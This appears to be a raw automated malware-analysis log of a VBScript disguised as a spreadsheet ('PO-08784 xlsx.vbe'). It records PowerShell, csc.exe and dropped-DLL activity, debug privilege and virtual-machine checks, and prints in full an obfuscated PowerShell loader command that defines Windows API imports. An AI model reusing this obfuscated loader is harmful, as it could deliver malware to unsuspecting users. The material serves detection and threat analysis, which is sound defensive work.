Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8859Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3344Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000003.252733876.000001332B549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dHe6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266939098.000001332B839000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.267864017.00000133295FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268235777.000001332B731000.00000004.00000020.00020000.00000000.sdmp, PO-08784 xlsx.vbeBinary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.534323736.0000000005304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000000.00000003.266250386.000001332B9AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""tJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
